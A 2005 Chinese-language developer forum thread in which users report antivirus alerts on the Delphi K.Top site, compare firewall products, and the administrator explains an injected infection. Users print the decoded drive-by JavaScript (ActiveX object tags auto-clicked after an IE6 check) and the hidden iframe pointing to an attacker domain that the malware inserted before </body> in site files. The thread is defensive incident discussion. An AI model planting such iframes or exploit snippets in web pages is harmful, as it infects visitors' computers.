站長大人!    站上是否被植入木馬或入侵了, 我每上一個網頁都會被我的防駭軟體給攔截下來, 如下圖 而且不只一隻, 至少有三支

不會吧!@@ 我的電腦都沒有攔截到說!XD

我試了一下果然如同QOO1234與PD所言，是有些異常! 用http://www.filseclab.com/cht/去常駐，再開網頁真的會跑出警告! 對HDD SCAN也會有他的暫存警告~不過因為沒有註冊，無法列出中毒的檔案，所以也不知道實際狀況是如何。PS在這同時使用微軟的AntiSpyware去SCAN.一點反應也沒有! 而看了一下，實際會發出警告的網頁是http://www.650411.net/taiwan/default.htm中的,其中的JAVASCRIPT含有存取"主動式內容"的CODE..@@~~ 發表人 - huwk 於 2005/11/23 21:51:46

------
熊的學習 http://huwk.blogspot.com

我的Kaspersky 偵測到一隻特洛伊木馬 VBscript 型態.

------
人生就像泡泡一樣，乘著風被吹著跑，等你發現時已經消失了。
就在快要消失的瞬間，希望能再飛高一點，
但是回神時總是慢了一步。

看錯 是JavaScript才對~sorry

------
人生就像泡泡一樣，乘著風被吹著跑，等你發現時已經消失了。
就在快要消失的瞬間，希望能再飛高一點，
但是回神時總是慢了一步。

我是用 PC-Cillin 2005 每天更新病毒疫苗 上此網站沒有提出警告訊息 -------------------------------- 這一網站,真的不錯!!

------
---------------------------------------
偶爾才來 KTOP ,交流條碼問題,在 FB [條碼標籤達人] 社團留言,感恩.

剛才查看了一下若你用FIREFOX好像比較安全!因為他會判別你是不是IE6 @@~ 解出來JAVASCRIPT包的CODE如下.有興趣的朋友看看囉~也希望對大家的復原有幫助! PS有點亂.沒整理

<HTML>
<BODY>



<OBJECT id="window98" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>
<OBJECT id="windXP" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>
<OBJECT id="cnbore2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>


var tk=navigator.userAgent;
if(tk.indexOf('MSIE 6.0')>=1){
windXP.Click();
}else{
window98.Click();
}
setTimeout("cnbore2.Click();",0);

</BODY></HTML>
 

發表人 - huwk 於 2005/11/23 22:14:57

------
熊的學習 http://huwk.blogspot.com

網頁開越多次..mshta.exe在Windows工作管理員出現越多    網海無涯，唯學是岸！

聽說被值木馬了~~ 我什麼都沒有看見，也許我用 linux+firefox所以沒影響吧    樹大招風，站大招小人!!縮頭烏龜，植木馬有啥了不起?只是會用 tool，三歲小兒都會 請天使查log， 必要時不排除報警處理!!     成長四步曲 多看--->多做--->多問--->多發表 如果您希望別人用心的回答，也請您用心的描述標題與問題

不好意示,因昨日上ktop過度查詢資料後,如 P.D. 所言,有CHECK 到病毒,不久之後,我的電腦中毒了,在進入 KTOP 後會再出現一小視窗.(右上角有 '說明..) 之後就消失,然後 KTOP 網頁就停住了.我已在解毒了,但不敢上 KTOP ,已用另一台上來,不知情況如何,是否請先進們告知... 謝謝.. WANG

不知道是不是跟作業系統有關係 我用win2003 到目前為止 沒出現任何異狀 電腦裝了兩套防火牆軟體 也沒發現有木馬跑進跑出 不過看網頁的原始檔 是有發現奇怪的code!!

我用的是Kaspersky. IE就會有類似的攔截訊息 火狐(FireFox)就正常 發表人 - neoart 於 2005/11/24 17:38:20

原來PD兄  也是使用 費爾個人防火牆   不知是那個版本 如果可以是否 可以提供 防火牆設定的概要或範本 因為我都是設定 連出連入尋問 不知PD兄是否也是與庵一樣的設定

引言: 【分享】免費的 防火牆 繁體 http://delphi.ktop.com.tw/topic.php?TOPIC_ID=81390

網友大大 請問你的作品,文章等 是否願意貢獻 給於KTOP網站,日後使用於DVD/VCD發售 如果可以請在簽名檔上宣告個人授權 以加速KTOP網站日後DVD/VCD資料的誕生 台灣災難都是事後算帳 無人飛行載具(Unmanned Aerial Vehicle，UAV)為什麼沒大量應用於救災行列 絲絲有2種 .net有很多種 一種治眼睛是MS 另一種治腦筋是Borland

引言: 原來PD兄 也是使用 費爾個人防火牆 不知是那個版本 如果可以是否 可以提供 防火牆設定的概要或範本 因為我都是設定 連出連入尋問 不知PD兄是否也是與庵一樣的設定

我使用的不是費爾的防火牆, 而是同一家公司的費爾托斯系統, 其本身具有防 駭, 防毒, 防木馬的功能, 使用上還算不錯, 這套是要$$, 但不貴, 可以上 www.softking.com.tw 查詢, 我喜歡的原因主要是他們在設計版權的做法非常 合情合理, 而且不分server, client都可以用, 在攔截上我每一家客戶都有裝, 至目前為止還沒有聽說有被入侵的。 而費爾的防火牆我使用過, 說實在話並不好用, 因為如果你設計偵測上以詢問為 主時, 十次連線有5,6次會被詢問是否開放, 不勝其擾, 而對一般的用戶來說也 略嫌複雜了點, 如果是預設被拒絶的話, 很多要通過Internet的都過不去, 事後 還要一一去調整, 防火牆我用過的KasperSky(卡巴斯基)是蠻好的一套, Panda的 也還ok, Pccillin的算了吧! 發表人 - P.D. 於 2005/11/24 21:48:50

原始碼內含這一段 

 <iframe src="http://fucktw.go.3322.org" width=0 height=0></iframe>

請版主移除... 發表人 - roller 於 2005/11/24 21:59:19

多謝PD兄的回應    再請問一下 PD兄 是否有玩過以下軟體 【轉貼】SoftEther(虛擬網卡)v2.0 Beta3  http://delphi.ktop.com.tw/topic.php?TOPIC_ID=80060 【轉貼】SoftEther 1.0(虛擬網卡)  http://delphi.ktop.com.tw/topic.php?TOPIC_ID=80073    網友大大 請問你的作品,文章等 是否願意貢獻 給於KTOP網站,日後使用於DVD/VCD發售 如果可以請在簽名檔上宣告個人授權 以加速KTOP網站日後DVD/VCD資料的誕生 台灣災難都是事後算帳 無人飛行載具(Unmanned Aerial Vehicle，UAV)為什麼沒大量應用於救災行列 絲絲有2種 .net有很多種 一種治眼睛是MS 另一種治腦筋是Borland

引言: 多謝PD兄的回應 再請問一下 PD兄 是否有玩過以下軟體

SORRY! 沒有, 我對虛擬的東東沒有什麼興趣唉!

很抱歉,因為站長出國一個星期,回國後才獲知這個消息! 對於造成各位網友的困擾,在此鄭重道歉! 這個病毒暫時清除! 他的手法是搜尋.HTM/.HTML/.ASP/.PHP等Script程式檔案 找到 < / body > 語法處 , 在前面加上 < i frame src="http://fucktw.go.3322.org" width=0 height=0> < / iframe> 讓本站網頁導入fucktw.go.3322.org這個病毒網頁中 目前本站採取了一些防範措施,希望能奏效, 猜測是利用IIS的漏洞進來的! 本站對此人的行為表示嚴厲的譴責, 並且已經保留相關證據, 保留日後的法律追究權利! 再次感謝各位熱心的協助! 站長敬上 ～～～Delphi K.Top討論區站長～～～

------
～～～Delphi K.Top討論區站長～～～

引言: 很抱歉,因為站長出國一個星期,回國後才獲知這個消息! 對於造成各位網友的困擾,在此鄭重道歉! 這個病毒暫時清除! 他的手法是搜尋.HTM/.HTML/.ASP/.PHP等Script程式檔案 找到 < / body > 語法處 , 在前面加上 < i frame src="http://fucktw.go.3322.org" width=0 height=0> < / iframe> 讓本站網頁導入fucktw.go.3322.org這個病毒網頁中 目前本站採取了一些防範措施,希望能奏效, 猜測是利用IIS的漏洞進來的! 本站對此人的行為表示嚴厲的譴責, 並且已經保留相關證據, 保留日後的法律追究權利! 再次感謝各位熱心的協助! 站長敬上 ～～～Delphi K.Top討論區站長～～～

我自己的一個論壇是XOOPS2做的也發生過同樣的問題 但那是PHP MYSQL做的 所以應該不是利用IIS的漏洞進來的 不知道他是怎麼弄